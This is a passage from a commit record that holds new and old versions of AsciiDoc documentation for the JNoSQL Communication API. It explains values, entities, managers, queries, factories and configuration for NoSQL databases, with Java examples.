0.001));\nentity.add(Document.of(\"name\", \"Diana\"));\nentity.add(Document.of(\"options\", Arrays.asList(1, 2, 3)));\n\nList<Document> documents = entity.getDocuments();\nOptional<Document> id = entity.find(\"id\");\nentity.remove(\"options\");\n----\n\n==== KeyValueEntity\n\nThe `KeyValueEntity` is the simplest structure; it has a tuple and a key-value structure. As the previous entity, it has direct access to information using alias method to `Value`.\n\n[source,java]\n----\nKeyValueEntity<String> entity = KeyValueEntity.of(\"key\", Value.of(123));\nKeyValueEntity<Integer> entity2 = KeyValueEntity.of(12, \"Text\");\nString key = entity.getKey();\nValue value = entity.getValue();\nInteger integer = entity.get(Integer.class);\n----\n\n\n=== Manager\n\nThe Manager is the class that pushes information to a database and retrieves it. The manager might have a synchronous and asynchronous implementation.\n\n\n* *DocumentCollectionManager*\n* *DocumentCollectionManagerAsync*\n* *ColumnConfiguration*\n* *ColumnConfigurationAsync*\n* *BucketManager*\n\n==== Document Manager\n\nThe manager class to a document type can be synchronous or asynchronous:\n\n* *DocumentCollectionManager*: To do synchronous operations.\n* *DocumentCollectionManagerAsync*: To do asynchronous operations.\n\n===== DocumentCollectionManager\n\nThe `DocumentCollectionManager` is the class that manages the persistence on the synchronous way to document collection.\n\n[source,java]\n----\nDocumentEntity entity = DocumentEntity.of(\"collection\");\nDocument diana = Document.of(\"name\", \"Diana\");\nentity.add(diana);\n\nList<DocumentEntity> entities = Collections.singletonList(entity);\nDocumentCollectionManager manager = \/\/instance;\n\/\/insert operations\nmanager.insert(entity);\nmanager.insert(entity, Duration.ofHours(2L));\/\/inserts with 2 hours of TTL\nmanager.insert(entities, Duration.ofHours(2L));\/\/inserts with 2 hours of TTL\n\/\/updates operations\nmanager.update(entity);\nmanager.update(entities);\n----\n\n===== DocumentCollectionManagerAsync\n\nThe `DocumentCollectionManagerAsync` is the class that manages the persistence on an asynchronous way to document collection.\n\n[source,java]\n----\nDocumentEntity entity = DocumentEntity.of(\"collection\");\nDocument diana = Document.of(\"name\", \"Diana\");\nentity.add(diana);\n\nList<DocumentEntity> entities = Collections.singletonList(entity);\nDocumentCollectionManagerAsync managerAsync = \/\/instance\n\n\/\/insert operations\nmanagerAsync.insert(entity);\nmanagerAsync.insert(entity, Duration.ofHours(2L));\/\/inserts with 2 hours of TTL\nmanagerAsync.insert(entities, Duration.ofHours(2L));\/\/inserts with 2 hours of TTL\n\/\/updates operations\nmanagerAsync.update(entity);\nmanagerAsync.update(entities);\n----\n\nSometimes on an asynchronous process, it's important to know when this process is over, so the `DocumentCollectionManagerAsync` also has callback support.\n\n[source,java]\n----\nConsumer<DocumentEntity> callBack = e -> {};\nmanagerAsync.insert(entity, callBack);\nmanagerAsync.update(entity, callBack);\n----\n\n===== Search information on a document collection\n\nThe Document Communication API has support to retrieve information from both ways; synchronous and asynchronous, from the `DocumentQuery` class. The `DocumentQuery` has information such as sort type, document, and also the condition to retrieve information.\n\nThe condition on `DocumentQuery` is given from `DocumentCondition`, which has the status and the document. E.g. The condition behind is to find a name equal \"**Ada**\".\n[source,java]\n----\nDocumentCondition nameEqualsAda = DocumentCondition.eq(Document.of(\"name\", \u201cAda\u201d));\n----\n\nAlso, the developer can use the aggregators such as **AND**, **OR**, and **NOT**.\n\n[source,java]\n----\nDocumentCondition nameEqualsAda = DocumentCondition.eq(Document.of(\"name\", \"Ada\"));\nDocumentCondition youngerThan2Years = DocumentCondition.lt(Document.of(\"age\", 2));\nDocumentCondition condition = nameEqualsAda.and(youngerThan2Years);\nDocumentCondition nameNotEqualsAda = nameEqualsAda.negate();\n----\n\nIf there isn\u2019t a condition in the query, that means the query will try to retrieve all information from the database, similar to a \u201c`select * from database`\u201d in a relational database, just remembering that the return depends on the driver. It is important to say that not all NoSQL databases have support for this resource.\n`DocumentQuery` also has pagination feature to define where the data starts, and its limits.\n\n[source,java]\n----\nDocumentCollectionManager manager = \/\/instance;\nDocumentCollectionManagerAsync managerAsync = \/\/instance;\nDocumentQuery query = DocumentQueryBuilder.select().from(\"collection\").where(\"age\").lt(10).and(\"name\").eq(\"Ada\").orderBy(\"name\").asc().limit(10).skip(2).build();\nList<DocumentEntity> entities = manager.select(query);\nOptional<DocumentEntity> entity = manager.singleResult(query);\nConsumer<List<DocumentEntity>> callback = e -> {};\nmanagerAsync.select(query, callback);\n----\n\n===== Removing information from Document Collection\n\nSuch as `DocumentQuery`, there is a class to remove information from the document database type: A `DocumentDeleteQuery` type.\n\nIt is smoother than `DocumentQuery` because there isn\u2019t pagination and sort feature, once this information is unnecessary to remove information from database.\n\n[source,java]\n----\nDocumentCollectionManager manager = \/\/instance;\nDocumentCollectionManagerAsync managerAsync = \/\/instance;\nDocumentDeleteQuery query = DocumentQueryBuilder.delete().from(\"collection\").where(\"age\").gt(10).build();\nmanager.delete(query);\nmanagerAsync.delete(query);\nmanagerAsync.delete(query, v -> {});\n----\n\n==== Column Manager\n\nThe Manager class for the column family type can be synchronous or asynchronous:\n\n* *ColumnFamilyManager*: To do synchronous operations.\n* *ColumnFamilyManagerAsync*: To do asynchronous operations.\n\n===== ColumnFamilyManager\n\nThe `ColumnFamilyManager` is the class that manages the persistence on the synchronous way to column family.\n\n[source,java]\n----\nColumnEntity entity = ColumnEntity.of(\"columnFamily\");\nColumn diana = Column.of(\"name\", \"Diana\");\nentity.add(diana);\n\nList<ColumnEntity> entities = Collections.singletonList(entity);\nColumnFamilyManager manager = \/\/instance;\n\n\/\/inserts operations\nmanager.insert(entity);\nmanager.insert(entity, Duration.ofHours(2L));\/\/inserts with 2 hours of TTL\nmanager.insert(entities, Duration.ofHours(2L));\/\/inserts with 2 hours of TTL\n\/\/updates operations\nmanager.update(entity);\nmanager.update(entities);\n----\n\n===== ColumnFamilyManagerAsync\n\nThe `ColumnFamilyManagerAsync` is the class that manages the persistence on the asynchronous way to column family.\n\n[source,java]\n----\nColumn diana = Column.of(\"name\", \"Diana\");\nentity.add(diana);\n\nList<ColumnEntity> entities = Collections.singletonList(entity);\nColumnFamilyManagerAsync managerAsync = null;\n\n\/\/inserts operations\nmanagerAsync.insert(entity);\nmanagerAsync.insert(entity, Duration.ofHours(2L));\/\/inserts with 2 hours of TTL\nmanagerAsync.insert(entities, Duration.ofHours(2L));\/\/inserts with 2 hours of TTL\n\/\/updates operations\nmanagerAsync.update(entity);\nmanagerAsync.update(entities);\n----\n\nSometimes on an asynchronous process, is important to know when this process is over, so the `ColumnFamilyManagerAsync` also has callback support.\n\n[source,java]\n----\nConsumer<ColumnEntity> callBack = e -> {};\nmanagerAsync.insert(entity, callBack);\nmanagerAsync.update(entity, callBack);\n----\n\n===== Search information on a column family\n\n\nThe Column communication API has support to retrieve information from both ways synchronous and asynchronous from the `ColumnQuery` class. The `ColumnQuery` has information such as sort type, document and also the condition to retrieve information.\n\nThe condition on `ColumnQuery` is given from ColumnCondition, which has the status and the column. E.g. The condition behind is to find a name equal \"**Ada**\".\n[source,java]\n----\nColumnCondition nameEqualsAda = ColumnCondition.eq(Column.of(\"name\", \u201cAda\u201d));\n----\n\nAlso, the developer can use the aggregators such as **AND**, **OR**, and **NOT**.\n\n[source,java]\n----\nColumnCondition nameEqualsAda = ColumnCondition.eq(Column.of(\"name\", \"Ada\"));\nColumnCondition youngerThan2Years = ColumnCondition.lt(Column.of(\"age\", 2));\nColumnCondition condition = nameEqualsAda.and(youngerThan2Years);\nColumnCondition nameNotEqualsAda = nameEqualsAda.negate();\n----\n\nIf there isn\u2019t condition at the query, that means the query will try to retrieve all information from the database, look like a \u201c`select * from database`\u201d in a relational database, just to remember the return depends on from driver. It is important to say that not all NoSQL databases have support for this resource.\n\n`ColumnQuery` also has pagination feature to define where the data starts, and its limits.\n\n[source,java]\n----\nColumnFamilyManager manager = \/\/instance;\nColumnFamilyManagerAsync managerAsync = \/\/instance;\nColumnQuery query = ColumnQuery query = ColumnQueryBuilder.select().from(\"collection\").where(\"age\").lt(10).and(\"name\").eq(\"Ada\").orderBy(\"name\").asc().limit(10).skip(2).build();\n\nList<ColumnEntity> entities = manager.select(query);\nOptional<ColumnEntity> entity = manager.singleResult(query);\n\nConsumer<List<ColumnEntity>> callback = e -> {};\nmanagerAsync.select(query, callback);\n----\n\n===== Removing information from Column Family\n\nSuch as `ColumnQuery`, there is a class to remove information from the column database type: A `ColumnDeleteQuery` type.\n\nIt is smoother than `ColumnQuery` because there isn\u2019t pagination and sort feature, once this information is unnecessary to remove information from database.\n\n[source,java]\n----\nColumnFamilyManager manager = \/\/instance;\nColumnFamilyManagerAsync managerAsync = \/\/instance;\n\nColumnDeleteQuery query = ColumnQueryBuilder.delete()\n .from(\"collection\").where(\"age\").gt(10).build();\n\nmanager.delete(query);\n\nmanagerAsync.delete(query);\nmanagerAsync.delete(query, v -> {});\n----\n\n\n==== BucketManager\n\nThe `BucketManager` is the class which saves the KeyValueEntity on a synchronous way in key-value database.\n\n[source,java]\n----\nBucketManager bucketManager= null;\nKeyValueEntity<String> entity = KeyValueEntity.of(\"key\", 1201);\nSet<KeyValueEntity<String>> entities = Collections.singleton(entity);\nbucketManager.put(\"key\", \"value\");\nbucketManager.put(entity);\nbucketManager.put(entities);\nbucketManager.put(entities, Duration.ofHours(2));\/\/two hours TTL\nbucketManager.put(entity, Duration.ofHours(2));\/\/two hours TTL\n----\n\n===== Removing and retrieve information from a key-value database\n\nWith a simple structure, the bucket needs a key to both retrieve and delete information from the database.\n\n[source,java]\n----\nOptional<Value> value = bucketManager.get(\"key\");\nIterable<Value> values = bucketManager.get(Collections.singletonList(\"key\"));\nbucketManager.remove(\"key\");\nbucketManager.remove(Collections.singletonList(\"key\"));\n----\n\ninclude::communication_query.adoc[]\n\n=== Factory\n\nThe factory class creates the *Managers*.\n\n* *ColumnFamilyManagerAsyncFactory*\n* *ColumnFamilyManagerFactory*\n* *BucketManagerFactory*\n* *DocumentCollectionManagerFactory*\n* *DocumentCollectionManagerAsyncFactory*\n\n\n==== Column Family Manager Factory\n\nThe factory classes have the duty to create the column family manager.\n\n* *ColumnFamilyManagerAsyncFactory*\n* *ColumnFamilyManagerFactory*\n\nThe `ColumnFamilyManagerAsyncFactory` and `ColumnFamilyManagerFactory` create the manager synchronously and asynchronously respectively.\n\n[source,java]\n----\nColumnFamilyManagerFactory factory = \/\/instance\nColumnFamilyManagerAsyncFactory asyncFactory = \/\/instance\nColumnFamilyManager manager = factory.get(\"database\");\nColumnFamilyManagerAsync managerAsync = asyncFactory.getAsync(\"database\");\n----\n\nThe factories were separated intentionally, as not all databases support synchronous and asynchronous operations.\n\n==== Document Collection Factory\n\nThe factory classes have the duty to create the document collection manager.\n\n* *DocumentCollectionManagerFactory*\n* *DocumentCollectionManagerAsyncFactory*\n\nThe `DocumentCollectionManagerAsyncFactory` and `DocumentCollectionManagerFactory` create the manager synchronously and asynchronously respectively.\n\n[source,java]\n----\nDocumentCollectionManagerFactory factory = \/\/instance\nDocumentCollectionManagerAsyncFactory asyncFactory = \/\/instance\nDocumentCollectionManager manager = factory.get(\"database\");\nDocumentCollectionManagerAsync managerAsync = asyncFactory.getAsync(\"database\");\n----\n\nThe factories were separated intentionally, as not all databases support synchronous and asynchronous operations.\n\n==== Bucket Manager Factory\n\nThe factory classes have the duty to create the bucket manager.\n\n\n[source,java]\n----\nBucketManagerFactory bucketManager= \/\/instance\nBucketManager bucket = bucketManager.getBucketManager(\"bucket\");\n----\n\nBeyond the BucketManager, some databases have support for particular structures represented in the Java world such as `List`, `Set`, `Queue` e `Map`.\n\n\n[source,java]\n----\nList<String> list = bucketManager.getList(\"list\", String.class);\nSet<String> set = bucketManager.getSet(\"set\", String.class);\nQueue<String> queue = bucketManager.getQueue(\"queue\", String.class);\nMap<String, String> map = bucketManager.getMap(\"map\", String.class, String.class);\n----\n\nThese methods may return a `java.lang.UnsupportedOperationException` if the database does not support any of the structures.\n\n=== Configuration\n\n\nThe configuration classes create a Manager Factory. This class has all the configuration to build the database connection.\n\nOnce there are a large diversity configuration flavors on such as P2P, master\/slave, thrift communication, HTTP, etc. The implementation may be different, however, they have a method to return a Manager Factory. It is recommended that all database driver providers have a properties file to read this startup information.\n\n\n==== Settings\n\nThe Settings interface represents the settings used in a configuration. It extends a `Map<String, Object>`; for this reason, gives a key that can set any value as configuration.\n\n[source,java]\n----\nSettings settings = Settings.builder().put(\"key\", \"value\").build();\nMap<String, Object> map = ....;\nSettings settings = Settings.of(map);\n----\n\n\n==== Document Configuration\n\nOn the document collection configuration, there are two classes, `DocumentConfiguration` and `DocumentConfigurationAsync` to `DocumentCollectionManagerFactory` and `DocumentCollectionManagerAsyncFactory` respectively.\n\n[source,java]\n----\nDocumentConfiguration configuration = \/\/instance\nDocumentConfigurationAsync configurationAsync = \/\/instance\nDocumentCollectionManagerFactory managerFactory = configuration.get();\nDocumentCollectionManagerAsyncFactory managerAsyncFactory = configurationAsync.getAsync();\n----\n\nIf a database has support for both synchronous and asynchronous, it may use `UnaryDocumentConfiguration` that implements both document configurations.\n\n[source,java]\n----\nUnaryDocumentConfiguration unaryDocumentConfiguration = \/\/instance\nDocumentCollectionManagerFactory managerFactory = unaryDocumentConfiguration.get();\nDocumentCollectionManagerAsyncFactory managerAsyncFactory = unaryDocumentConfiguration.getAsync();\n----\n\n==== Column Configuration\n\nOn the column family configuration, there are two classes, `ColumnConfiguration` and `ColumnConfigurationAsync` to `ColumnFamilyManagerFactory` and `ColumnFamilyManagerAsyncFactory` respectively.\n\n[source,java]\n----\nColumnConfiguration configuration = \/\/instance\nColumnConfigurationAsync configurationAsync = \/\/instance\nColumnFamilyManagerFactory managerFactory = configuration.get();\nColumnFamilyManagerAsyncFactory managerAsyncFactory = configurationAsync.getAsync();\n----\n\nIf a database has support for both synchronous and asynchronous, it may use `UnaryColumnConfiguration` that implements both document configurations.\n\n[source,java]\n----\nUnaryColumnConfiguration unaryDocumentConfiguration = \/\/instance\nColumnFamilyManagerFactory managerFactory = unaryDocumentConfiguration.get();\nColumnFamilyManagerAsyncFactory managerAsyncFactory = unaryDocumentConfiguration.getAsync();\n----\n\n==== Key Value Configuration\n\n\nOn the key-value configuration, there is KeyValueConfiguration to BucketManagerFactory.\n\n[source,java]\n----\nKeyValueConfiguration configuration = \/\/instance\nBucketManagerFactory managerFactory = configuration.get();\n----\n\n=== The diversity on NoSQL database\n\nIn NoSQL world, beyond the several types, it's trivial a particular database has features that do exist on this provider. When there is a change among the types, column family, and document collection, there is a considerable change. Notably, with a switch to the same kind such as column family to column family, e.g., Cassandra to HBase, there is the same problem once Cassandra has featured such as Cassandra query language and consistency level. The communication API allows looking the variety on NoSQL database. The configurations classes, and entity factory return specialist class from a provider.\n\n[source,java]\n----\n public interface ColumnFamilyManagerFactory<SYNC extends ColumnFamilyManager> extends AutoCloseable {\n SYNC get(String database);\n}\n----\n\nA `ColumnFamilyManagerFactory` returns a class that implements `ColumnFamilyManager`. E.g.: Using a particular resource from Cassandra driver.\n\n[source,java]\n----\nCassandraConfiguration condition = new CassandraConfiguration();\ntry(CassandraDocumentEntityManagerFactory managerFactory = condition.get()) {\n CassandraColumnFamilyManager columnEntityManager = managerFactory.get(KEY_SPACE);\n ColumnEntity entity = ColumnEntity.of(COLUMN_FAMILY);\n Column id = Column.of(\"id\", 10L);\n entity.add(id);\n entity.add(Column.of(\"version\", 0.001));\n entity.add(Column.of(\"name\", \"Diana\"));\n entity.add(Column.of(\"options\", Arrays.asList(1, 2, 3)));\n columnEntityManager.save(entity);\n \/\/common implementation\n ColumnQuery query = ColumnQuery.of(COLUMN_FAMILY);\n query.and(ColumnCondition.eq(id));\n Optional<ColumnEntity> result = columnEntityManager.singleResult(query);\n \/\/cassandra implementation\n columnEntityManager.save(entity, ConsistencyLevel.THREE);\n List<ColumnEntity> entities = columnEntityManager.cql(\"select * from newKeySpace.newColumnFamily\");\n System.out.println(entities);\n}\n----","old_contents":"\/\/\n\/\/ Copyright (c) 2018 Ot\u00e1vio Santana and others\n\/\/ All rights reserved. This program and the accompanying materials\n\/\/ are made available under the terms of the Eclipse Public License v1.0\n\/\/ and Apache License v2.0 which accompanies this distribution.\n\/\/ The Eclipse Public License is available at http:\/\/www.eclipse.org\/legal\/epl-v10.html\n\/\/ and the Apache License v2.0 is available at http:\/\/www.opensource.org\/licenses\/apache2.0.php.\n\/\/\n\/\/ You may elect to redistribute this code under either of these licenses.\n\/\/\n\/\/ Contributors:\n\/\/\n\/\/ Otavio Santana\n\n== Communication API Introduction\n\n\nWith the strategy to divide and conquer on JNoSQL, the communication API was born. It has the goal to make the communication layer easy and extensible. The extensibility is more than important, that is entirely necessary once the API must support specific feature in each database. Nonetheless, the advantage of a common API in a change to another database provider has lesser than using the specific API.\n\nTo cover the three kinds of database, this API has three packages, one for each database.\n\n* `org.jnosql.column`\n* `org.jnosql.document`\n* `org.jnosql.key`\n\nIMPORTANT: The package name might change on the Jakarta EE process.\n\nThere isn't a communication API because of the Graph API already does exist, that is link:http:\/\/tinkerpop.apache.org\/[Apache TinkerPop].\n\nSo, if a database is multi-model, has support to more than one database, it will implement an API to each database which it supports. Also, each API has the TCK to prove if the database is compatible with the API. Even from different NoSQL types, it tries to use the same nomenclature:\n\n* Configuration\n* Factory\n* Manager\n* Entity\n* Value\n\n=== The API structure\n\nThe communication has four projects:\n\n* The *communication-core*: The JNoSQL API communication common to all types.\n* The *communication-key-value*: The JNoSQL communication API layer to key-value database.\n* The *communication-column*: The JNoSQL communication API layer to column database.\n* The *communication-document*: The JNoSQL communication API layer to document database.\n\nEach module works separately; thereby, a NoSQL vendor just needs to implement the specific type, e.g., a key-value provider will apply a key-value API. If a NoSQL already has a driver, this API can work as an adapter with the current one. To multi-model NoSQL, providers will implement the API which they need.\n\nWARNING: To the Graph communication API, there is the link:http:\/\/tinkerpop.apache.org\/[Apache TinkerPop] that won\u2019t be covered in this documentation.\n\n\n=== Value\n\nThis interface represents the value that will store, that is a wrapper to be a bridge between the database and the application. E.g. If a database does not support a Java type, it may do the conversion with ease.\n\n[source,java]\n----\nValue value = Value.of(12);\n----\n\nThe Value interface has the methods:\n\n* `Object get();` Returns the value as Object\n\n* `<T> T get(Class<T> clazz);` Does the conversion process to the required type that is the safer way to do it. If the type required doesn\u2019t have support, it will throw an exception, although the API allows to create custom converters.\n\n* `<T> T get(TypeSupplier<T> typeSupplier);` Similar to the previous method, it does the conversion process but using a structure that uses generics such as List, Map, Stream and Set.\n\n[source,java]\n----\nValue value = Value.of(12);\nString string = value.get(String.class);\nList<Integer> list = value.get(new TypeReference<List<Integer>>() {});\nSet<Long> set = value.get(new TypeReference<Set<Long>>() {});\nStream<Integer> stream = value.get(new TypeReference<Stream<Integer>>() {});\nObject integer = value.get();\n----\n\n==== Make custom Writer and Reader\n\nAs mentioned before, the `Value` interface is to store the cost information into a database. The API already has support to the Java type such as primitive types, wrappers types, new Java 8 date time. Furthermore, the developer can create a custom converter easily and quickly. It has two interfaces:\n\n\n* `ValueWriter`: This interface represents a `Value` instance to write in a database.\n* `ValueReader`: This interface represents how the `Value` will convert to Java application. This interface will use the `<T> T get(Class<T> clazz)` and <T> T `get(TypeSupplier<T> typeSupplier)`.\n\nBoth class implementations load from Java SE ServiceLoader resource. So, to Communication API learn a new type, just register on ServiceLoader, e.g., Given a Money type:\n\n[source,java]\n----\npublic class Money {\n\n private final String currency;\n\n private final BigDecimal value;\n\n Money(String currency, BigDecimal value) {\n this.currency = currency;\n this.value = value;\n }\n\n public String getCurrency() {\n return currency;\n }\n\n public BigDecimal getValue() {\n return value;\n }\n\n @Override\n public String toString() {\n return currency + ' ' + value;\n }\n\n public static Money parse(String text) {\n String[] texts = text.split(\" \");\n return new Money(texts[0], BigDecimal.valueOf(Double.valueOf(texts[1])));\n }\n}\n----\n\nJust to be more didactic, the book creates a simple money representation. As everyone knows, that is not a good practice reinventing the wheel, so in production, the Java Developer must use mature Money APIs such as link:https:\/\/github.com\/JavaMoney[Moneta] that is the reference implementation of link:https:\/\/jcp.org\/en\/jsr\/detail?id=354[JSR 354].\n\nThe first step is to create the converter to a custom type database, the `ValueWriter`. It has two methods:\n\n* `boolean isCompatible(Class clazz)`: Check if the given class has support for this implementation.\n* `S write(T object)`: Once the implementation supports the type, the next step converts a `T` instance to `S` type.\n\n\n[source,java]\n----\npublic class MoneyValueWriter implements ValueWriter<Money, String> {\n\n @Override\n public boolean isCompatible(Class clazz) {\n return Money.class.equals(clazz);\n }\n\n @Override\n public String write(Money money) {\n return money.toString();\n }\n}\n----\n\nWith the `MoneyValueWriter` created and the Money type will save as String, then the next step is read information to Java application. As can be seen, a `ValueReader` implementation. This interface has two methods:\n\n* `boolean isCompatible(Class clazz)`; Check if the given class has support for this implementation.\n* `<T> T read(Class<T> clazz, Object value)`; Converts to the `T` type from Object instance.\n\n[source,java]\n----\npublic class MoneyValueReader implements ValueReader {\n\n @Override\n public boolean isCompatible(Class clazz) {\n return Money.class.equals(clazz);\n }\n\n @Override\n public <T> T read(Class<T> clazz, Object value) {\n return (T) Money.parse(value.toString());\n }\n}\n----\n\nAfter both implementations are done, the last step is to register them into two files:\n\n* `META-INF\/services\/org.jnosql.ValueReader`\n* `META-INF\/services\/org.jnosql.ValueWriter`\n\nEach file will have the qualifier of this respective implementation:\n\nThe file `org.jnosql.ValueReader` will have:\n\n```\nmy.company.MoneyValueReader\n```\n\nThe file `org.jnosql.ValueWriter` will have:\n\n```\nmy.company.MoneyValueWriter\n```\n\n[source,java]\n----\nValue value = Value.of(\"BRL 10.0\");\nMoney money = value.get(Money.class);\nList<Money> list = value.get(new TypeReference<List<Money>>() {});\nSet<Money> set = value.get(new TypeReference<Set<Money>>() {});;\n----\n\n\n=== Element Entity\n\nThe *Element entity* is a small piece of a body, except a key-value structure type, once this structure is simple. E.g. The column family structure, the entity has columns, element entity with column has a tuple where the key is the name, and the value is the information as a `Value` implementation.\n\n* *Document*\n* *Column*\n\n\n==== Document\n\nThe `Document` is a small piece of a Document entity. Each document has a tuple where the key is the document name, and the value is the information itself as `Value`.\n\n[source,java]\n----\nDocument document = Document.of(\"name\", \"value\");\nValue value = document.getValue();\nString name = document.getName();\n----\n\nThe document might have another document inside; the subdocument concept.\n\n[source,java]\n----\nDocument subDocument = Document.of(\"subDocument\", document);\n----\n\nThe way to store information in subdocuments will also depend on each driver's implementation.\n\nTo access the information from `Document`, it has an alias method to `Value`; in other words, it does a conversion directly from `Document` _interface_.\n\n[source,java]\n----\nDocument age = Document.of(\"age\", 29);\nString ageString = age.get(String.class);\nList<Integer> ages = age.get(new TypeReference<List<Integer>>() {});\nObject ageObject = age.get();\n----\n\n\n==== Column\n\nThe Column is a small piece of the column family entity. Each column has a tuple where the name represents a key and the value itself as a `Value` implementation.\n\n[source,java]\n----\nColumn document = Column.of(\"name\", \"value\");\nValue value = document.getValue();\nString name = document.getName();\n----\n\nWith this interface, we may have a column inside a column.\n\n\n[source,java]\n----\nColumn subColumn = Column.of(\"subColumn\", column);\n----\n\nThe way to store a subcolumn will also depend on each driver's implementation as well as the information.\n\nTo access the information from `Column`, it has an alias method to `Value`; thus, you can do a conversion directly from `Column` _interface_.\n\n[source,java]\n----\nColumn age = Column.of(\"age\", 29);\nString ageString = age.get(String.class);\nList<Integer> ages = age.get(new TypeReference<List<Integer>>() {});\nObject ageObject = age.get();\n----\n\n=== Entity\n\nThe Entity is the body of the information that goes to the database; each database has an Entity:\n\n* ColumnEntity\n* DocumentEntity\n* KeyValueEntity\n\n==== ColumnFamilyEntity\n\nThe `ColumnFamilyEntity` is an entity to column family database type. It is composed of one or more columns. As a result, the Column is a tuple of name and value.\n\n[source,java]\n----\nColumnEntity entity = ColumnEntity.of(\"columnFamily\");\nentity.add(Column.of(\"id\", Value.of(10L)));\nentity.add(Column.of(\"version\", 0.001));\nentity.add(Column.of(\"name\", \"Diana\"));\nentity.add(Column.of(\"options\", Arrays.asList(1, 2, 3)));\n\nList<Column> columns = entity.getColumns();\nOptional<Column> id = entity.find(\"id\");\n----\n\n==== DocumentEntity\n\nThe `DocumentEntity` is an entity to document collection database type. It is composed of one or more documents. As a result, the Document is a tuple of name and value.\n\n[source,java]\n----\nDocumentEntity entity = DocumentEntity.of(\"documentFamily\");\nString name = entity.getName();\nentity.add(Document.of(\"id\", Value.of(10L)));\nentity.add(Document.of(\"version\", 0.001));\nentity.add(Document.of(\"name\", \"Diana\"));\nentity.add(Document.of(\"options\", Arrays.asList(1, 2, 3)));\n\nList<Document> documents = entity.getDocuments();\nOptional<Document> id = entity.find(\"id\");\nentity.remove(\"options\");\n----\n\n==== KeyValueEntity\n\nThe `KeyValueEntity` is the simplest structure; it has a tuple and a key-value structure. As the previous entity, it has direct access to information using alias method to `Value`.\n\n[source,java]\n----\nKeyValueEntity<String> entity = KeyValueEntity.of(\"key\", Value.of(123));\nKeyValueEntity<Integer> entity2 = KeyValueEntity.of(12, \"Text\");\nString key = entity.getKey();\nValue value = entity.getValue();\nInteger integer = entity.get(Integer.class);\n----\n\n\n=== Manager\n\nThe Manager is the class that pushes information to a database and retrieves it. The manager might have a synchronous and asynchronous implementation.\n\n\n* *DocumentCollectionManager*\n* *DocumentCollectionManagerAsync*\n* *ColumnConfiguration*\n* *ColumnConfigurationAsync*\n* *BucketManager*\n\n==== Document Manager\n\nThe manager class to a document type can be synchronous or asynchronous:\n\n* *DocumentCollectionManager*: To do synchronous operations.\n* *DocumentCollectionManagerAsync*: To do asynchronous operations.\n\n===== DocumentCollectionManager\n\nThe `DocumentCollectionManager` is the class that manages the persistence on the synchronous way to document collection.\n\n[source,java]\n----\nDocumentEntity entity = DocumentEntity.of(\"collection\");\nDocument diana = Document.of(\"name\", \"Diana\");\nentity.add(diana);\n\nList<DocumentEntity> entities = Collections.singletonList(entity);\nDocumentCollectionManager manager = \/\/instance;\n\/\/insert operations\nmanager.insert(entity);\nmanager.insert(entity, Duration.ofHours(2L));\/\/inserts with 2 hours of TTL\nmanager.insert(entities, Duration.ofHours(2L));\/\/inserts with 2 hours of TTL\n\/\/updates operations\nmanager.update(entity);\nmanager.update(entities);\n----\n\n===== DocumentCollectionManagerAsync\n\nThe `DocumentCollectionManagerAsync` is the class that manages the persistence on an asynchronous way to document collection.\n\n[source,java]\n----\nDocumentEntity entity = DocumentEntity.of(\"collection\");\nDocument diana = Document.of(\"name\", \"Diana\");\nentity.add(diana);\n\nList<DocumentEntity> entities = Collections.singletonList(entity);\nDocumentCollectionManagerAsync managerAsync = \/\/instance\n\n\/\/insert operations\nmanagerAsync.insert(entity);\nmanagerAsync.insert(entity, Duration.ofHours(2L));\/\/inserts with 2 hours of TTL\nmanagerAsync.insert(entities, Duration.ofHours(2L));\/\/inserts with 2 hours of TTL\n\/\/updates operations\nmanagerAsync.update(entity);\nmanagerAsync.update(entities);\n----\n\nSometimes on an asynchronous process, it's important to know when this process is over, so the `DocumentCollectionManagerAsync` also has callback support.\n\n[source,java]\n----\nConsumer<DocumentEntity> callBack = e -> {};\nmanagerAsync.insert(entity, callBack);\nmanagerAsync.update(entity, callBack);\n----\n\n===== Search information on a document collection\n\nThe Document Communication API has support to retrieve information from both ways; synchronous and asynchronous, from the `DocumentQuery` class. The `DocumentQuery` has information such as sort type, document, and also the condition to retrieve information.\n\nThe condition on `DocumentQuery` is given from `DocumentCondition`, which has the status and the document. E.g. The condition behind is to find a name equal \"**Ada**\".\n[source,java]\n----\nDocumentCondition nameEqualsAda = DocumentCondition.eq(Document.of(\"name\", \u201cAda\u201d));\n----\n\nAlso, the developer can use the aggregators such as **AND**, **OR**, and **NOT**.\n\n[source,java]\n----\nDocumentCondition nameEqualsAda = DocumentCondition.eq(Document.of(\"name\", \"Ada\"));\nDocumentCondition youngerThan2Years = DocumentCondition.lt(Document.of(\"age\", 2));\nDocumentCondition condition = nameEqualsAda.and(youngerThan2Years);\nDocumentCondition nameNotEqualsAda = nameEqualsAda.negate();\n----\n\nIf there isn\u2019t a condition in the query, that means the query will try to retrieve all information from the database, similar to a \u201c`select * from database`\u201d in a relational database, just remembering that the return depends on the driver. It is important to say that not all NoSQL databases have support for this resource.\n`DocumentQuery` also has pagination feature to define where the data starts, and its limits.\n\n[source,java]\n----\nDocumentCollectionManager manager = \/\/instance;\nDocumentCollectionManagerAsync managerAsync = \/\/instance;\nDocumentQuery query = DocumentQueryBuilder.select().from(\"collection\").where(\"age\").lt(10).and(\"name\").eq(\"Ada\").orderBy(\"name\").asc().limit(10).skip(2).build();\nList<DocumentEntity> entities = manager.select(query);\nOptional<DocumentEntity> entity = manager.singleResult(query);\nConsumer<List<DocumentEntity>> callback = e -> {};\nmanagerAsync.select(query, callback);\n----\n\n===== Removing information from Document Collection\n\nSuch as `DocumentQuery`, there is a class to remove information from the document database type: A `DocumentDeleteQuery` type.\n\nIt is smoother than `DocumentQuery` because there isn\u2019t pagination and sort feature, once this information is unnecessary to remove information from database.\n\n[source,java]\n----\nDocumentCollectionManager manager = \/\/instance;\nDocumentCollectionManagerAsync managerAsync = \/\/instance;\nDocumentDeleteQuery query = DocumentQueryBuilder.delete().from(\"collection\").where(\"age\").gt(10).build();\nmanager.delete(query);\nmanagerAsync.delete(query);\nmanagerAsync.delete(query, v -> {});\n----\n\n==== Column Manager\n\nThe Manager class for the column family type can be synchronous or asynchronous:\n\n* *ColumnFamilyManager*: To do synchronous operations.\n* *ColumnFamilyManagerAsync*: To do asynchronous operations.\n\n===== ColumnFamilyManager\n\nThe `ColumnFamilyManager` is the class that manages the persistence on the synchronous way to column family.\n\n[source,java]\n----\nColumnEntity entity = ColumnEntity.of(\"columnFamily\");\nColumn diana = Column.of(\"name\", \"Diana\");\nentity.add(diana);\n\nList<ColumnEntity> entities = Collections.singletonList(entity);\nColumnFamilyManager manager = \/\/instance;\n\n\/\/inserts 